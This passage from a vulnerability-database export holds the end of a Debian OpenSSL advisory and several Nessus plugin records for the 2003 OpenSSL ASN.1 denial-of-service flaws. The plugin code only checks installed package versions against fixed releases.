99d22f1d4d23ff8b927f94a9df3997b4\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/o/openssl095/libssl095a_0.9.5a-6.woody.3_alpha.deb\n Size/MD5 checksum: 497152 fe3d6854382f8dbe2d10f3f5700dd8f6\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/o/openssl095/libssl095a_0.9.5a-6.woody.3_arm.deb\n Size/MD5 checksum: 402498 551b79fbb80903f174d6edeffd9869df\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/o/openssl095/libssl095a_0.9.5a-6.woody.3_i386.deb\n Size/MD5 checksum: 399752 2a856ac6b45d41beb0bf78880b236966\n\n Motorola 680x0 architecture:\n\n http://security.debian.org/pool/updates/main/o/openssl095/libssl095a_0.9.5a-6.woody.3_m68k.deb\n Size/MD5 checksum: 376738 980e428e9b913672d939ebe77c18cd6d\n\n Big endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/o/openssl095/libssl095a_0.9.5a-6.woody.3_mips.deb\n Size/MD5 checksum: 412624 b8c7cc0b4dcbf1cf03480b93c78cd610\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/o/openssl095/libssl095a_0.9.5a-6.woody.3_mipsel.deb\n Size/MD5 checksum: 407388 de02385580cf33c344c1ffadcf8aed88\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/o/openssl095/libssl095a_0.9.5a-6.woody.3_powerpc.deb\n Size/MD5 checksum: 425452 c3d04af89c64e6e9f0175e6cd4997058\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/o/openssl095/libssl095a_0.9.5a-6.woody.3_sparc.deb\n Size/MD5 checksum: 412196 ae1181c2873a304c583800459da53e5a\n\n\n These files will probably be moved into the stable distribution on\n its next revision.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show &lt;pkg&gt;&#x27; and http://packages.debian.org/&lt;pkg&gt;\n\n", "edition": 2, "modified": "2003-10-11T00:00:00", "published": "2003-10-11T00:00:00", "id": "DEBIAN:DSA-394-1:84FAE", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2003/msg00202.html", "title": "[SECURITY] [DSA 394-1] New openssl095 packages fix denial of service", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-06T09:50:29", "description": "Dr. Stephen Henson (), using a test suite provided by NISCC (),\ndiscovered a number of errors in the OpenSSL ASN1 code. Combined with\nan error that causes the OpenSSL code to parse client certificates\neven when it should not, these errors can cause a denial of service\n(DoS) condition on a system using the OpenSSL code, depending on how\nthat code is used. For example, even though apache-ssl and ssh link to\nOpenSSL libraries, they should not be affected by this vulnerability.\nHowever, other SSL-enabled applications may be vulnerable and an\nOpenSSL upgrade is recommended.", "edition": 26, "published": "2004-09-29T00:00:00", "title": "Debian DSA-393-1 : openssl - denial of service", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0544", "CVE-2003-0543"], "modified": "2004-09-29T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:3.0", "p-cpe:/a:debian:debian_linux:openssl"], "id": "DEBIAN_DSA-393.NASL", "href": "https://www.tenable.com/plugins/nessus/15230", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-393. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15230);\n script_version(\"1.30\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2003-0543\", \"CVE-2003-0544\");\n script_bugtraq_id(8732);\n script_xref(name:\"DSA\", value:\"393\");\n\n script_name(english:\"Debian DSA-393-1 : openssl - denial of service\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Dr. Stephen Henson (), using a test suite provided by NISCC (),\ndiscovered a number of errors in the OpenSSL ASN1 code. Combined with\nan error that causes the OpenSSL code to parse client certificates\neven when it should not, these errors can cause a denial of service\n(DoS) condition on a system using the OpenSSL code, depending on how\nthat code is used. For example, even though apache-ssl and ssh link to\nOpenSSL libraries, they should not be affected by this vulnerability.\nHowever, other SSL-enabled applications may be vulnerable and an\nOpenSSL upgrade is recommended.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2003/dsa-393\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"For the current stable distribution (woody) these problems have been\nfixed in version 0.9.6c-2.woody.4.\n\nWe recommend that you update your openssl package. Note that you will\nneed to restart services which use the libssl library for this update\nto take effect.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/10/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/09/29\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2003/07/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"libssl-dev\", reference:\"0.9.6c-2.woody.4\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"libssl0.9.6\", reference:\"0.9.6c-2.woody.4\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"openssl\", reference:\"0.9.6c-2.woody.4\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"ssleay\", reference:\"0.9.6c-2.woody.4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-17T13:05:16", "description": "Updated OpenSSL packages are available that fix ASN.1 parsing\nvulnerabilities.\n\nOpenSSL is a commercial-grade, full-featured, and open source toolkit\nthat implements Secure Sockets Layer (SSL v2/v3) and Transport Layer\nSecurity (TLS v1) protocols as well as a full-strength general purpose\ncryptography library.\n\nNISCC testing of implementations of the SSL protocol uncovered two\nbugs in OpenSSL 0.9.6. The parsing of unusual ASN.1 tag values can\ncause OpenSSL to crash. A remote attacker could trigger this bug by\nsending a carefully crafted SSL client certificate to an application.\nThe effects of such an attack vary depending on the application\ntargetted; against Apache the effects are limited, as the attack would\nonly cause child processes to die and be replaced. An attack against\nother applications that use OpenSSL could result in a Denial of\nService. The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the names CVE-2003-0543 and CVE-2003-0544\nto this issue.\n\nThese erratum packages contain a patch provided by the OpenSSL group\nthat protects against this issue.\n\nBecause server applications are affected by this issue, users are\nadvised to either restart all services that use OpenSSL functionality\nor reboot their systems after installing these updates.\n\nRed Hat would like to thank NISCC and Stephen Henson for their work on\nthis vulnerability.\n\nThese packages also include a patch from OpenSSL 0.9.6f which removes\nthe calls to abort the process in certain circumstances. Red Hat would\nlike to thank Patrik Hornik for notifying us of this issue.", "edition": 29, "published": "2004-07-06T00:00:00", "title": "RHEL 2.1 : openssl (RHSA-2003:293)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0544", "CVE-2003-0543"], "modified": "2004-07-06T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:2.1", "p-cpe:/a:redhat:enterprise_linux:openssl-perl", "p-cpe:/a:redhat:enterprise_linux:openssl", "p-cpe:/a:redhat:enterprise_linux:openssl095a", "p-cpe:/a:redhat:enterprise_linux:openssl096", "p-cpe:/a:redhat:enterprise_linux:openssl-devel"], "id": "REDHAT-RHSA-2003-293.NASL", "href": "https://www.tenable.com/plugins/nessus/12425", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2003:293. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(12425);\n script_version(\"1.35\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2003-0543\", \"CVE-2003-0544\");\n script_bugtraq_id(8732);\n script_xref(name:\"RHSA\", value:\"2003:293\");\n\n script_name(english:\"RHEL 2.1 : openssl (RHSA-2003:293)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated OpenSSL packages are available that fix ASN.1 parsing\nvulnerabilities.\n\nOpenSSL is a commercial-grade, full-featured, and open source toolkit\nthat implements Secure Sockets Layer (SSL v2/v3) and Transport Layer\nSecurity (TLS v1) protocols as well as a full-strength general purpose\ncryptography library.\n\nNISCC testing of implementations of the SSL protocol uncovered two\nbugs in OpenSSL 0.9.6. The parsing of unusual ASN.1 tag values can\ncause OpenSSL to crash. A remote attacker could trigger this bug by\nsending a carefully crafted SSL client certificate to an application.\nThe effects of such an attack vary depending on the application\ntargetted; against Apache the effects are limited, as the attack would\nonly cause child processes to die and be replaced. An attack against\nother applications that use OpenSSL could result in a Denial of\nService. The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the names CVE-2003-0543 and CVE-2003-0544\nto this issue.\n\nThese erratum packages contain a patch provided by the OpenSSL group\nthat protects against this issue.\n\nBecause server applications are affected by this issue, users are\nadvised to either restart all services that use OpenSSL functionality\nor reboot their systems after installing these updates.\n\nRed Hat would like to thank NISCC and Stephen Henson for their work on\nthis vulnerability.\n\nThese packages also include a patch from OpenSSL 0.9.6f which removes\nthe calls to abort the process in certain circumstances. Red Hat would\nlike to thank Patrik Hornik for notifying us of this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2003-0543\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2003-0544\"\n );\n # http://www.niscc.gov.uk/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.cpni.gov.uk/\"\n );\n # http://www.openssl.org/news/secadv/20030930.txt\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.openssl.org/news/secadv/20030930.txt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2003:293\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl095a\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl096\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:2.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2003/11/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^2\\.1([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 2.1\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2003:293\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"openssl-0.9.6b-35.7\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i686\", reference:\"openssl-0.9.6b-35.7\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"openssl-devel-0.9.6b-35.7\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"openssl-perl-0.9.6b-35.7\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"openssl095a-0.9.5a-23.7.3\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"openssl096-0.9.6-23.7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssl / openssl-devel / openssl-perl / openssl095a / openssl096\");\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-07T11:51:19", "description": "Two bugs were discovered in OpenSSL 0.9.6 and 0.9.7 by NISCC. The\nparsing of unusual ASN.1 tag values can cause OpenSSL to crash, which\ncould be triggered by a remote attacker by sending a carefully-crafted\nSSL client certificate to an application. Depending upon the\napplication targetted, the effects seen will vary; in some cases a DoS\n(Denial of Service) could be performed, in others nothing noticeable\nor adverse may happen. These two vulnerabilities have been assigned\nCVE-2003-0543 and CVE-2003-0544.\n\nAdditionally, NISCC discovered a third bug in OpenSSL 0.9.7. Certain\nASN.1 encodings that are rejected as invalid by the parser can trigger\na bug in deallocation of a structure, leading to a double free. This\ncan be triggered by a remote attacker by sending a carefully-crafted\nSSL client certificate to an application. This vulnerability may be\nexploitable to execute arbitrary code. This vulnerability has been\nassigned CVE-2003-0545.\n\nThe packages provided have been built with patches provided by the\nOpenSSL group that resolve these issues.\n\nA number of server applications such as OpenSSH and Apache that make\nuse of OpenSSL need to be restarted after the update has been applied\nto ensure that they are protected from these issues. Users are\nencouraged to restart all of these services or reboot their systems.", "edition": 25, "published": "2004-07-31T00:00:00", "title": "Mandrake Linux Security Advisory : openssl (MDKSA-2003:098)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0544", "CVE-2003-0543", "CVE-2003-0545"], "modified": "2004-07-31T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:libopenssl0.9.7", "p-cpe:/a:mandriva:linux:libopenssl0-devel", "p-cpe:/a:mandriva:linux:openssl", "cpe:/o:mandrakesoft:mandrake_linux:9.1", "cpe:/o:mandrakesoft:mandrake_linux:8.2", "p-cpe:/a:mandriva:linux:libopenssl0.9.7-static-devel", "cpe:/o:mandrakesoft:mandrake_linux:9.2", "p-cpe:/a:mandriva:linux:libopenssl0.9.7-devel", "p-cpe:/a:mandriva:linux:libopenssl0", "p-cpe:/a:mandriva:linux:lib64openssl0.9.7-devel", "p-cpe:/a:mandriva:linux:lib64openssl0.9.7", "p-cpe:/a:mandriva:linux:libopenssl0-static-devel", "cpe:/o:mandrakesoft:mandrake_linux:9.0", "p-cpe:/a:mandriva:linux:lib64openssl0.9.7-static-devel"], "id": "MANDRAKE_MDKSA-2003-098.NASL", "href": "https://www.tenable.com/plugins/nessus/14080", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2003:098. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(14080);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2003-0543\", \"CVE-2003-0544\", \"CVE-2003-0545\");\n script_xref(name:\"CERT\", value:\"255484\");\n script_xref(name:\"CERT\", value:\"380864\");\n script_xref(name:\"CERT\", value:\"935264\");\n script_xref(name:\"MDKSA\", value:\"2003:098\");\n\n script_name(english:\"Mandrake Linux Security Advisory : openssl (MDKSA-2003:098)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Two bugs were discovered in OpenSSL 0.9.6 and 0.9.7 by NISCC. The\nparsing of unusual ASN.1 tag values can cause OpenSSL to crash, which\ncould be triggered by a remote attacker by sending a carefully-crafted\nSSL client certificate to an application. Depending upon the\napplication targetted, the effects seen will vary; in some cases a DoS\n(Denial of Service) could be performed, in others nothing noticeable\nor adverse may happen. These two vulnerabilities have been assigned\nCVE-2003-0543 and CVE-2003-0544.\n\nAdditionally, NISCC discovered a third bug in OpenSSL 0.9.7. Certain\nASN.1 encodings that are rejected as invalid by the parser can trigger\na bug in deallocation of a structure, leading to a double free. This\ncan be triggered by a remote attacker by sending a carefully-crafted\nSSL client certificate to an application. This vulnerability may be\nexploitable to execute arbitrary code. This vulnerability has been\nassigned CVE-2003-0545.\n\nThe packages provided have been built with patches provided by the\nOpenSSL group that resolve these issues.\n\nA number of server applications such as OpenSSH and Apache that make\nuse of OpenSSL need to be restarted after the update has been applied\nto ensure that they are protected from these issues. Users are\nencouraged to restart all of these services or reboot their systems.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.openssl.org/news/secadv/20030930.txt\"\n );\n # http://www.uniras.gov.uk/vuls/2003/006489/openssl.htm\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://marc.info/?l=openssl-dev&m=108445413725636\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.uniras.gov.uk/vuls/2003/006489/tls.htm\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64openssl0.9.7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64openssl0.9.7-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64openssl0.9.7-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libopenssl0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libopenssl0-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libopenssl0-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libopenssl0.9.7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libopenssl0.9.7-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libopenssl0.9.7-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:8.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:9.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:9.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:9.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2003/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK8.2\", cpu:\"i386\", reference:\"libopenssl0-0.9.6i-1.5.82mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.2\", cpu:\"i386\", reference:\"libopenssl0-devel-0.9.6i-1.5.82mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.2\", cpu:\"i386\", reference:\"libopenssl0-static-devel-0.9.6i-1.5.82mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.2\", cpu:\"i386\", reference:\"openssl-0.9.6i-1.5.82mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK9.0\", cpu:\"i386\", reference:\"libopenssl0-0.9.6i-1.6.90mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.0\", cpu:\"i386\", reference:\"libopenssl0-devel-0.9.6i-1.6.90mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.0\", cpu:\"i386\", reference:\"libopenssl0-static-devel-0.9.6i-1.6.90mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.0\", cpu:\"i386\", reference:\"openssl-0.9.6i-1.6.90mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"libopenssl0-0.9.6i-1.2.91mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"libopenssl0.9.7-0.9.7a-1.2.91mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"libopenssl0.9.7-devel-0.9.7a-1.2.91mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"libopenssl0.9.7-static-devel-0.9.7a-1.2.91mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"openssl-0.9.7a-1.2.91mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK9.2\", cpu:\"amd64\", reference:\"lib64openssl0.9.7-0.9.7b-5.1.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", cpu:\"amd64\", reference:\"lib64openssl0.9.7-devel-0.9.7b-5.1.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", cpu:\"amd64\", reference:\"lib64openssl0.9.7-static-devel-0.9.7b-5.1.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", cpu:\"i386\", reference:\"libopenssl0.9.7-0.9.7b-4.1.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", cpu:\"i386\", reference:\"libopenssl0.9.7-devel-0.9.7b-4.1.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", cpu:\"i386\", reference:\"libopenssl0.9.7-static-devel-0.9.7b-4.1.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", cpu:\"amd64\", reference:\"openssl-0.9.7b-5.1.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", cpu:\"i386\", reference:\"openssl-0.9.7b-4.1.92mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T11:32:10", "description": "s700_800 11.04 Virtualvault 4.5 OWS update : \n\nPotential Apache HTTP server vulnerabilities have been reported:\nCVE-2003-0545 CVE-2003-0543 CVE-2003-0544 CERT VU#935264 CERT\nVU#255484 CERT VU#255484 CERT VU#686224 CERT VU#732952 CERT VU#104280\nhttp://www.openssl.org/news/secadv/20030930.txt.", "edition": 24, "published": "2005-02-16T00:00:00", "title": "HP-UX PHSS_29690 : HPSBUX0310-284 SSRT3622 rev.3 HP-UX Apache HTTP Server Denial of Service,unauthorized access", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2003-0544", "CVE-2003-0543", "CVE-2003-0545"], "modified": "2005-02-16T00:00:00", "cpe": ["cpe:/o:hp:hp-ux"], "id": "HPUX_PHSS_29690.NASL", "href": "https://www.tenable.com/plugins/nessus/16631", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and patch checks in this plugin were \n# extracted from HP patch PHSS_29690. The text itself is\n# copyright (C) Hewlett-Packard Development Company, L.P.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(16631);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", 